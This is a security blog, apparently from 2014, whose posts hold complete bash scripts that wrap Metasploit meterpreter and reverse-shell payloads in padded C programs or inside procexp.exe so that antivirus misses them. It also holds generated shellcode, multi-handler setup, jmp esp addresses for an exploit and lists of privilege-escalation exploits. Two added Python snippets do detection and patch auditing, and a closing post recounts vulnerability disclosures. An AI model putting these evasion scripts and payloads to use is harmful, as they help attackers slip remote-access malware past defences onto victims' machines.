Monday, November 24, 2014

bash script built on technique to bypass AV v2

This script has been improved and is located at this blog post.

I took the previous script that I created and spent some time adding additional padding and moving the meterpreter portion of the C code to a variable inside of the main function.

With these few modifications I was able to achieve the following results as I uploaded them to virustotal.com.

The sample at the top of the screenshot was generated with version 1 of the script below.  With the script below the detection rate decreases to 2-4 anti-virus engines detecting the files out of an average of 55.

The below script is what I used to generate the exe files...

#!/bin/bash
#

# Log file recording how each payload was created and the filename it was saved under
logFile='/root/bypassAV/logFile.txt'

# Bash script to test payloads created with msfvenom and using a c program to hide against AVG 2015
# Platform: Windows XP SP3
# AV Installed: AVG 2015 Free

# Using the following msfvenom options
# Payload: windows/meterpreter/reverse_tcp
# LHOST: 172.27.66.1
# LPORT: 8080
# Bad Characters: \x00 \xff
# Encoder: x86/shikata_ga_nai
# Iterations: 3
# Output format: C

# Create some padding to be compiled in the C program: a random number (5-204) of
# char arrays, each with a random 12-letter name and 2048 random characters
function generatePadding {

    counter=0
    randomNumber=$((RANDOM%200+5))
    #echo $randomNumber
    while [ $counter -lt $randomNumber ]; do
        echo "" >> /root/bypassAV/prog.c
        randomCharname=$(tr -dc 'a-zA-Z' < /dev/urandom | head -c 12)
        randomPadding=$(tr -dc '_a-zA-Z0-9' < /dev/urandom | head -c 2048)
        echo "unsigned char ${randomCharname}[]=\"$randomPadding\";" >> /root/bypassAV/prog.c
        counter=$((counter+1))
    done
}

# Check to see if the drive is mounted on the test platform
if [[ ! -f "/mnt/payloadTest/mounted.txt" ]]; then
    mount -t cifs //172.27.66.130/share /mnt/payloadTest -o "username=malware,password=malware"
fi

# Loop until prog.exe has been compiled successfully
while [ ! -f /root/bypassAV/outputFiles/prog.exe ]; do

    # Generate 2048 characters of random awesomeness for padding
    randomFilename=$(tr -dc 'a-zA-Z' < /dev/urandom | head -c 12)
    randomPadding=$(tr -dc '_a-zA-Z0-9' < /dev/urandom | head -c 2048)
    echo "unsigned char ${randomFilename}[]=\"$randomPadding\";" > /root/bypassAV/prog.c
   
    generatePadding

    echo "" >> /root/bypassAV/prog.c
    echo "int main(void)" >> /root/bypassAV/prog.c
    echo "{" >> /root/bypassAV/prog.c
   
    generatePadding
   
    echo "" >> /root/bypassAV/prog.c
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.27.66.1 LPORT=8085 -b "\x00\xff" -e x86/shikata_ga_nai -i 3 -f c >> /root/bypassAV/prog.c

    generatePadding

    echo "" >> /root/bypassAV/prog.c
    echo "((void (*)())buf)();" >> /root/bypassAV/prog.c
    echo "" >> /root/bypassAV/prog.c
    echo "}" >> /root/bypassAV/prog.c

    # Rename the msfvenom buffer so the variable is not the default "buf"
    sed -i 's/buf/yiopl/g' /root/bypassAV/prog.c
    i586-mingw32msvc-gcc -o /root/bypassAV/outputFiles/prog.exe /root/bypassAV/prog.c
done

# If the prog.exe fails to be created then skip over the remaining commands
if [[ -f "/root/bypassAV/outputFiles/prog.exe" ]]; then

    # Create a random 64 character filename to use as the destination file
    randomFileName=$(tr -dc 'a-zA-Z0-9' < /dev/urandom | fold -w 64 | head -n 1)

    # Save the information to a log file in the event the file bypasses the AV
    echo "${randomFileName}.exe - msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.27.66.1 LPORT=8085 -b \"\x00\xff\" -e x86/shikata_ga_nai -i 3 -f c" >> $logFile

    cp -f /root/bypassAV/outputFiles/prog.exe /mnt/payloadTest/${randomFileName}.exe
    cp -f /root/bypassAV/outputFiles/prog.exe /root/bypassAV/archiveFiles/${randomFileName}.exe
    rm -f /root/bypassAV/outputFiles/prog.exe

fi
# End If for the prog.exe file not being created
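The padding the script emits is a series of long runs of random characters drawn from `_a-zA-Z0-9`, and that is also what makes the result stand out to a reviewer. As an added example from the detection side (not code from the original post), the Python below scans a file's bytes for such runs and flags those whose Shannon entropy is close to the maximum for that alphabet; the sample input is constructed inline, and the thresholds (512 bytes, 5.5 bits per byte) are assumptions to tune against your own binaries.

```python
import math
import random
import re
import string


def shannon_entropy(data: bytes) -> float:
    """Bits per byte of the given data (0.0 for empty or single-symbol input)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def find_padding_runs(data: bytes, min_len: int = 512, min_entropy: float = 5.5):
    """Return (offset, length, entropy) for every run of at least min_len bytes drawn
    from the [_A-Za-z0-9] alphabet whose entropy is at least min_entropy bits/byte.

    Uniformly random padding over these 63 symbols approaches log2(63) ~ 5.98 bits;
    prose (broken up by spaces) and repeated filler stay far below the threshold.
    """
    pattern = re.compile(rb"[_A-Za-z0-9]{" + str(min_len).encode() + b",}")
    hits = []
    for m in pattern.finditer(data):
        run = m.group(0)
        ent = shannon_entropy(run)
        if ent >= min_entropy:
            hits.append((m.start(), len(run), round(ent, 2)))
    return hits


def make_sample(seed: int = 1) -> bytes:
    """Constructed sample (not a real binary): benign text, then one 2048-character
    random pad like the ones the script above inserts, then low-entropy filler."""
    rng = random.Random(seed)
    alphabet = "_" + string.ascii_letters + string.digits
    pad = "".join(rng.choice(alphabet) for _ in range(2048)).encode()
    prefix = b"This program cannot be run in DOS mode.\r\n" * 4
    # Long enough to match the length test but repetitive, so entropy is 0.0
    suffix = b"\x00" * 64 + b"AAAAAAAA" * 400
    return prefix + pad + suffix


if __name__ == "__main__":
    for offset, length, entropy in find_padding_runs(make_sample()):
        print(f"suspicious run at offset {offset}: {length} bytes, {entropy} bits/byte")
```

Legitimate binaries carry long base64 blobs, embedded certificates and resource strings that also pass this test, so treat a hit as a triage signal to pair with other indicators rather than a verdict. Because the compiler places these arrays in the data sections, the scan applies to the built executable as well as to the generated prog.c.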


Also in researching other techniques I found the below web page:
https://www.pentestgeek.com/2014/07/15/bypassing-antivirus-crypter-cff-explorer/


Sunday, November 23, 2014

bash script built on technique to bypass AV

I found the following web page in my research about metasploit encoding and bypassing the AV.

https://www.christophertruncer.com/bypass-antivirus-with-meterpreter-as-the-payload-hyperion-fun/

From the article I created the following bash script to automate the creation of the .exe file, which is then copied through a file share to the Windows XP SP3 machine to test AVG 2015.  Fortunately or unfortunately, this technique does bypass AVG 2015 Free; so far a 3/3 (100%) success rate.  VirusTotal came back with 15 AVs detecting the files as malware.

This script has been improved and is located at this blog post.

#!/bin/bash
#

# Log file recording how each payload was created and the filename it was saved under
logFile='/root/bypassAV/logFile.txt'

# Bash script to test payloads created with msfvenom and using a c program to hide against AVG 2015
# Platform: Windows XP SP3
# AV Installed: AVG 2015 Free

# Using the following msfvenom options
# Payload: windows/meterpreter/reverse_tcp
# LHOST: 172.24.118.1
# LPORT: 8080
# Bad Characters: \x00 \xff
# Encoder: x86/shikata_ga_nai
# Iterations: 3
# Output format: C

# Check to see if the drive is mounted on the test platform
if [[ ! -f "/mnt/payloadTest/mounted.txt" ]]; then
    mount -t cifs //172.24.118.130/share /mnt/payloadTest -o "username=malware,password=malware"
fi

# Loop until prog.exe has been compiled successfully
while [ ! -f /root/bypassAV/outputFiles/prog.exe ]; do

    # Generate 2048 characters of random awesomeness for padding
    randomPadding=$(tr -dc '_a-zA-Z0-9' < /dev/urandom | head -c 2048)
    echo "unsigned char padding[]=\"$randomPadding\";" > /root/bypassAV/prog.c
    echo "" >> /root/bypassAV/prog.c
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.24.118.1 LPORT=8085 -b "\x00\xff" -e x86/shikata_ga_nai -i 3 -f c >> /root/bypassAV/prog.c
    echo "" >> /root/bypassAV/prog.c
    echo "int main(void) { ((void (*)())buf)();}" >> /root/bypassAV/prog.c

    # Using mingw on Kali Linux to compile the executable
    i586-mingw32msvc-gcc -o /root/bypassAV/outputFiles/prog.exe /root/bypassAV/prog.c
done
  
# If the prog.exe fails to be created then skip over the remaining commands
if [[ -f "/root/bypassAV/outputFiles/prog.exe" ]]; then

    # Create a random 64 character filename to use as the destination file
    randomFileName=$(tr -dc 'a-zA-Z0-9' < /dev/urandom | fold -w 64 | head -n 1)

    # Save the information to a log file in the event the file bypasses the AV
    echo "${randomFileName}.exe - msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.24.118.1 LPORT=8085 -b \"\x00\xff\" -e x86/shikata_ga_nai -i 3 -f c" >> $logFile

    cp -f /root/bypassAV/outputFiles/prog.exe /mnt/payloadTest/${randomFileName}.exe
    cp -f /root/bypassAV/outputFiles/prog.exe /root/bypassAV/archiveFiles/${randomFileName}.exe
    rm -f /root/bypassAV/outputFiles/prog.exe

fi
# End If for the prog.exe file not being created

msfencode bash script - Test encoding with up to 5 iterations

I was reading in the book "Metasploit - A Penetration Tester's Guide" about encoding the payload and also multi-encoding the payload, so I wanted to create a bash script to go through all the possibilities of the encoders with up to 5 iterations.  The script then copies each result over to a file share on a Windows XP SP3 computer with AVG installed.  AVG would then detect whether it was a virus.

Curious how this would work, I kicked out the following script.

#!/bin/bash
#
# File that contains the encoders that are available to msfencode
listEncoders='/root/multiEncoder/msfencode.listEncoders'

# Folder where the SYS Internals Suite EXE files are located
exeFiles='/root/multiEncoder/sysInternals/exe/'

# Log file recording how each payload was created and the filename it was saved under
logFile='/root/multiEncoder/logFile.txt'

# Number of iterations to run the encoding through
iterationCount=5

# Bash script to create various payloads that are multi-encoded and test them against AVG 2015
# Platform: Windows XP SP3
# AV Installed: AVG 2015 Free

# Using the following msfpayload options
# Payload: windows/shell_reverse_tcp
# LHOST: 172.29.231.1
# LPORT: 8080

# Check to see if the drive is mounted on the test platform
if [[ ! -f "/mnt/payloadTest/mounted.txt" ]]; then
    mount -t cifs //172.29.231.130/share /mnt/payloadTest -o "username=malware,password=malware"
fi

# Loop through the available encoders listed in msfencode.listEncoders (one per line)
while read -r encoder
do
    # Work through the iteration counts allowed for the encoding
    for (( i=2; i<=iterationCount; i++ ))
    do
        msfpayload windows/shell_reverse_tcp LHOST=172.29.231.1 LPORT=8080 R | msfencode -t exe -x "${exeFiles}procexp.exe" -o /root/multiEncoder/outputFiles/test.exe -e "${encoder}" -c "${i}" -k
   
        # If test.exe fails to be created then skip over the remaining commands
        if [[ -f "/root/multiEncoder/outputFiles/test.exe" ]]; then

            # Create a random 64 character filename to use as the destination file
            randomFileName=$(tr -dc 'a-zA-Z0-9' < /dev/urandom | fold -w 64 | head -n 1)

            # Save the information to a log file in the event the encoding bypasses the AV
            echo "${randomFileName}.exe - msfpayload windows/shell_reverse_tcp LHOST=172.29.231.1 LPORT=8080 R | msfencode -t exe -x ${exeFiles}procexp.exe -o /root/multiEncoder/outputFiles/test.exe -e ${encoder} -c ${i} -k" >> "$logFile"

            cp -f /root/multiEncoder/outputFiles/test.exe "/mnt/payloadTest/${randomFileName}.exe"
            cp -f /root/multiEncoder/outputFiles/test.exe "/root/multiEncoder/archiveFiles/${randomFileName}.exe"
            rm -f /root/multiEncoder/outputFiles/test.exe

        fi
        # End If for the test.exe file not being created
    done
    # Done for the loop on the iterationCount

done < "$listEncoders"

Saturday, November 22, 2014

Notes about Windows Privilege Escalation

I need to research and understand Windows privilege escalation better, so this is the beginning of the journey.

Links to a couple of web pages that I have found to be great:
http://pentestmonkey.net/tools/windows-privesc-check
http://www.fuzzysecurity.com/tutorials/16.html
http://www.fuzzysecurity.com/tutorials/18.html
http://www.slideshare.net/harmj0y/power-up-34515686

accesschk.exe from the SYS Internals Suite

Evaluating the Windows privilege escalation Python script more closely, I was curious how the latest Windows patches were discovered and scrubbed against Metasploit.  I found that the following link takes you to an Excel spreadsheet containing all of the Windows security bulletins:

http://www.microsoft.com/en-us/download/details.aspx?id=36982

From fuzzysecurity.com I extracted some of the privilege escalation KB numbers...
KiTrap0D - KB979682
MS10-021 - KB979683
MS10-059 - KB982799
MS11-011 - KB2393802
MS11-080 - KB2592799

Pulled from Metasploit the local exploits that can be run (module - rank - description):
--------------------------------------------------------

exploit/windows/local/always_install_elevated - excellent - Windows AlwaysInstallElevated MSI
exploit/windows/local/bypassuac_injection - excellent - Windows Escalate UAC Protection Bypass (In Memory Injection)
exploit/windows/local/ms10_015_kitrap0d - great - Windows SYSTEM Escalation via KiTrap0D
exploit/windows/local/ms10_092_schelevator - excellent - Windows Escalate Task Scheduler XML Privilege Escalation
exploit/windows/local/ms11_080_afdjoinleaf - average - MS11-080 AfdJoinLeaf Privilege Escalation
exploit/windows/local/ms13_005_hwnd_broadcast - excellent - MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation
exploit/windows/local/ms13_053_schlamperei - average - Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)
exploit/windows/local/ms13_081_track_popup_menu - average - Windows TrackPopupMenuEx Win32k NULL Page
exploit/windows/local/ms13_097_ie_registry_symlink - great - MS13-097 Registry Symlink IE Sandbox Escape
exploit/windows/local/ms14_009_ie_dfsvc - great - MS14-009 .NET Deployment Service IE Sandbox Escape
exploit/windows/local/ms_ndproxy - average - MS14-002 Microsoft Windows ndproxy.sys Local Privilege Escalation
exploit/windows/local/ppr_flatten_rec - average - Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation
exploit/windows/local/trusted_service_path - excellent - Windows Service Trusted Path Privilege Escalation
exploit/windows/local/virtual_box_guest_additions - average - VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation

post/windows/escalate - Also look at these post exploitation modules...


Pulled from the exploitdb files.csv list on Kali Linux the following:
-----------------------------------------------------------------
root@p9jer5:/usr/share/exploitdb# cat files.csv | grep -e "MS0" -e "MS1" | grep -i -e "escala" -e "elevation"

350,platforms/windows/local/350.c,"MS Windows 2000 Utility Manager Privilege Elevation Exploit (MS04-019)",2004-07-14,"Cesar Cerrudo",windows,local,0
351,platforms/windows/local/351.c,"MS Windows 2K POSIX Subsystem Privilege Escalation Exploit (MS04-020)",2004-07-17,bkbll,windows,local,0
1198,platforms/windows/local/1198.c,"MS Windows CSRSS Local Privilege Escalation Exploit (MS05-018)",2005-09-06,eyas,windows,local,0
1407,platforms/windows/local/1407.c,"MS Windows 2k Kernel APC Data-Free Local Escalation Exploit (MS05-055)",2006-01-05,SoBeIt,windows,local,0
1911,platforms/windows/local/1911.c,"MS Windows XP/2K (Mrxsmb.sys) Privilege Escalation PoC (MS06-030)",2006-06-14,"Ruben Santamarta ",windows,local,0
2412,platforms/windows/local/2412.c,"MS Windows (Windows Kernel) Privilege Escalation Exploit (MS06-049)",2006-09-21,SoBeIt,windows,local,0
3688,platforms/windows/local/3688.c,"MS Windows GDI Local Privilege Escalation Exploit (MS07-017)",2007-04-08,Ivanlef0u,windows,local,0
3755,platforms/windows/local/3755.c,"MS Windows GDI Local Privilege Escalation Exploit (MS07-017) 2",2007-04-17,"Lionel d'Hauenens",windows,local,0
3804,platforms/windows/remote/3804.txt,"MS Windows (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017)",2007-04-26,"Lionel d'Hauenens",windows,remote,0
5518,platforms/windows/local/5518.txt,"MS Windows XP SP2 (win32k.sys) Privilege Escalation Exploit (MS08-025)",2008-04-28,"Ruben Santamarta ",windows,local,0
14611,platforms/windows/dos/14611.c,"Microsoft Windows 'SfnLOGONNOTIFY' Local Privilege Escalation Vulnerability (MS10-048)",2010-08-10,MJ0011,windows,dos,0
18176,platforms/windows/local/18176.py,"Windows Afd.sys - Privilege Escalation Exploit (MS11-080)",2011-11-30,ryujin,windows,local,0
21844,platforms/windows/local/21844.rb,"MS11-080 AfdJoinLeaf Privilege Escalation",2012-10-10,metasploit,windows,local,0
27296,platforms/windows/local/27296.rb,"MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation",2013-08-02,metasploit,windows,local,0
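The grep above pulls every MS-bulletin escalation entry out of files.csv for reading by eye. As an added example (not part of the original notes), the Python below parses the same rows with the csv module, keeps the entries of type local, and checks the bulletin numbers against the KB mapping listed above and a constructed list of installed hotfixes, which is the patch-audit question a defender asks of this data: which bulletins with public local exploits are still missing? The header row and the installed-KB list are assumptions; the data rows are copied from the listing above.

```python
import csv
import io
import re

BULLETIN_RE = re.compile(r"MS\d{2}-\d{3}")

# Constructed sample in the files.csv layout. The header row is an assumption;
# the data rows are copied from the grep output in the notes.
SAMPLE_FILES_CSV = """id,file,description,date,author,platform,type,port
350,platforms/windows/local/350.c,"MS Windows 2000 Utility Manager Privilege Elevation Exploit (MS04-019)",2004-07-14,"Cesar Cerrudo",windows,local,0
3804,platforms/windows/remote/3804.txt,"MS Windows (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017)",2007-04-26,"Lionel d'Hauenens",windows,remote,0
14611,platforms/windows/dos/14611.c,"Microsoft Windows 'SfnLOGONNOTIFY' Local Privilege Escalation Vulnerability (MS10-048)",2010-08-10,MJ0011,windows,dos,0
18176,platforms/windows/local/18176.py,"Windows Afd.sys - Privilege Escalation Exploit (MS11-080)",2011-11-30,ryujin,windows,local,0
21844,platforms/windows/local/21844.rb,"MS11-080 AfdJoinLeaf Privilege Escalation",2012-10-10,metasploit,windows,local,0
"""

# Bulletin -> hotfix mapping exactly as given in the notes above (KiTrap0D is
# listed there by name only, so it is not keyed here).
KB_FOR_BULLETIN = {
    "MS10-021": "KB979683",
    "MS10-059": "KB982799",
    "MS11-011": "KB2393802",
    "MS11-080": "KB2592799",
}


def parse_entries(text: str) -> list:
    """Parse files.csv text into one dict per row, keyed by the header fields."""
    return list(csv.DictReader(io.StringIO(text)))


def local_escalation_entries(entries: list) -> list:
    """Mirror the grep: an MS bulletin in the description plus an escalation/elevation
    keyword, additionally restricted to entries exploit-db classifies as 'local'."""
    selected = []
    for entry in entries:
        desc = entry["description"]
        lowered = desc.lower()
        if (entry["type"] == "local"
                and ("escala" in lowered or "elevation" in lowered)
                and BULLETIN_RE.search(desc)):
            selected.append(entry)
    return selected


def bulletins_with_public_exploits(entries: list) -> dict:
    """Map each bulletin number to the set of exploit-db ids that reference it."""
    bulletins = {}
    for entry in entries:
        for bulletin in BULLETIN_RE.findall(entry["description"]):
            bulletins.setdefault(bulletin, set()).add(entry["id"])
    return bulletins


def unpatched_bulletins(bulletins: dict, installed_kbs: set, kb_map=KB_FOR_BULLETIN) -> dict:
    """Return bulletins whose hotfix is not in installed_kbs. A bulletin without a
    known KB is reported too, so it is looked up rather than silently ignored."""
    missing = {}
    for bulletin in bulletins:
        kb = kb_map.get(bulletin)
        if kb is None:
            missing[bulletin] = "KB unknown - look up in the bulletin spreadsheet"
        elif kb not in installed_kbs:
            missing[bulletin] = kb
    return missing


if __name__ == "__main__":
    # Constructed hotfix list, e.g. what `systeminfo` or `wmic qfe` would report
    installed = {"KB979683", "KB982799"}
    local = local_escalation_entries(parse_entries(SAMPLE_FILES_CSV))
    for bulletin, kb in sorted(unpatched_bulletins(
            bulletins_with_public_exploits(local), installed).items()):
        print(f"{bulletin}: {kb}")
```

The same functions run unchanged over the full files.csv; feeding them the real hotfix list from the target workstation turns the exploit-db listing into a short list of bulletins to patch first.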

Notes created for Immunity Debugger

Notes about generating a payload for a python script, setting up a multi-handler, and using a multi-handler to then exploit and gain a meterpreter shell.

Generate Meterpreter Reverse TCP with the multi-handler listening
-----------------------------------------------------------------
use payload/windows/meterpreter/reverse_ord_tcp
set lhost 172.31.99.1
set lport 4444

generate -b '\x00\x0a\x0d\x20' -t python
- This generates the payload as Python source, avoiding the bad characters listed after -b.

buf =  ""
buf += "\xda\xc1\xd9\x74\x24\xf4\xb8\xec\x27\x13\x24\x5b\x33"
buf += "\xc9\xb1\x18\x31\x43\x18\x83\xeb\xfc\x03\x43\xf8\xc5"
buf += "\xe6\xd8\x31\xd1\x6d\xaa\x72\xd5\xe6\xec\x78\x9e\xa9"
buf += "\xf0\x0b\xb2\xc2\x7b\x2b\x1e\x79\x35\x28\x66\xbf\xf8"
buf += "\x1d\x39\x8d\x89\x8e\x4e\x9b\x79\xdb\x14\x60\xf1\x97"
buf += "\x93\xe0\x8e\x6b\x91\x0c\x90\x9a\x22\x6d\xca\x5d\xdd"
buf += "\xe5\x9b\x61\x1c\x14\x58\xf0\x12\xbb\x35\x03\x41\x39"
buf += "\x35\xd3\x02\x55\x65\xc3\x4a\xa7\x1d\xe1\x92\xb6\x81"
buf += "\x6c\x73\xeb\x8e\x62\x27\x5d\xa6\x2b\xad\x4d\x19\x9c"
buf += "\x67\x91\x7c"

use exploit/multi/handler
set payload windows/meterpreter/reverse_ord_tcp
set lhost 172.31.99.1

*** With the Immunity Debugger we need to find memory addresses that have "jmp esp" instructions.

1. Load or attach the FTP server with Immunity Debugger
2. Press the "e" shortcut to open the Modules window listing all of the DLLs that are loaded
3. Double-click one that is not part of the FTP server itself
4. Right-click and go to Search for > "All commands in all modules"
5. Key in the instruction that you are searching for: "jmp esp"
6. It then returns a list of "jmp esp" instructions and their memory addresses...
Windows XP w/ SP3 - MFC42.dll 0x73E32ECF
Windows XP w/ SP3 - WINMM.dll 0x76B43ADC
Windows XP w/ SP3 - ADVAPI32.dll 0x77DEF049

Wednesday, November 5, 2014

Experiences of Reporting Vulnerabilities

I thought I would take a moment and memorialize a few experiences with reporting vulnerabilities to companies.  In the information below I am going to keep the companies anonymous.  The vulnerabilities discussed below have been mitigated by the companies to which they were reported.  I am going to share the good, bad, and ugly ways in which companies handled these reports.

The first experience was contacting a company that publishes content and allows this content to be accessed by their respective customers.  The vulnerability existed in the security between their customers and the content that could be accessed.  By manipulating the URL as an authenticated user you could view other customers' content, and then it was discovered that you could view this information without being authenticated at all.  Upon contacting the company directly and working with them, they were appreciative that I reached out to them, and I even received a courtesy call from the president of the company expressing his appreciation.

The second experience was working with a company that uses a content delivery network (CDN) to deliver its content.  However, as users transferred from the authenticated initial page to the material in the CDN, the session was not maintained, which allowed anyone to access the content without being authenticated.  The company again came back with appreciation for identifying this flaw in their platform.

Now to share a couple of experiences that did not turn out as positively during the process of reporting the vulnerabilities.

The third experience was working with a company that had multiple vulnerabilities, including a Cross-Site Request Forgery (CSRF) vulnerability which allows an administrator account to be created while another administrator is authenticated.  Upon reporting this to the company they set up a conference call to discuss it.  When the conference call occurred the company was unprepared with the information that I had provided.  They did not openly acknowledge they had an issue.  Then I sent them the proof-of-concept and notes that I had kept, and the conversation started over on the conference call.  I could not believe how ignorant they were in preparing for the conference call and how cocky they were until a real vulnerability was identified in their eyes.

The fourth experience involved a platform where a user authenticated to view billing information.  By manipulating the URL you could easily view other customers' billing information.  The first hurdle we ran into was how and where to report this vulnerability.  The only method of contact was through a customer service phone call.  After calling them they were unsure where to direct the call.  They eventually documented the ticket and escalated it.  About a month later I received a phone call from their attorney to clarify the information that was provided and determine the impact on the customers whose billing information was accessed.  He then went on a rant about not doing this and how what we did was illegal.  Being that I was the one to whom the vulnerability was reported and I had not exploited the vulnerability, I just listened.  With that stated, I could not believe they had no appreciation for finding and reporting this vulnerability; had it gone unreported it could have turned into a larger issue for the company (if it had not already turned into a larger issue).  In conversing a little more with their attorney I identified that their website was controlled by a vendor, and the vendor did not have the logs that would demonstrate which records were accessed through this vulnerability, so they were trying to depend on my records of which customers were impacted (which I did not have).  The company did let me know that the vulnerability was mitigated.  In my opinion, they have a lot of other issues to work through beyond the specific vulnerability that was identified.



Docker - Quick Notes and How To

For an ethical hacking class that I will be teaching coming up in the near future I wanted to identify a way where I could provide students ...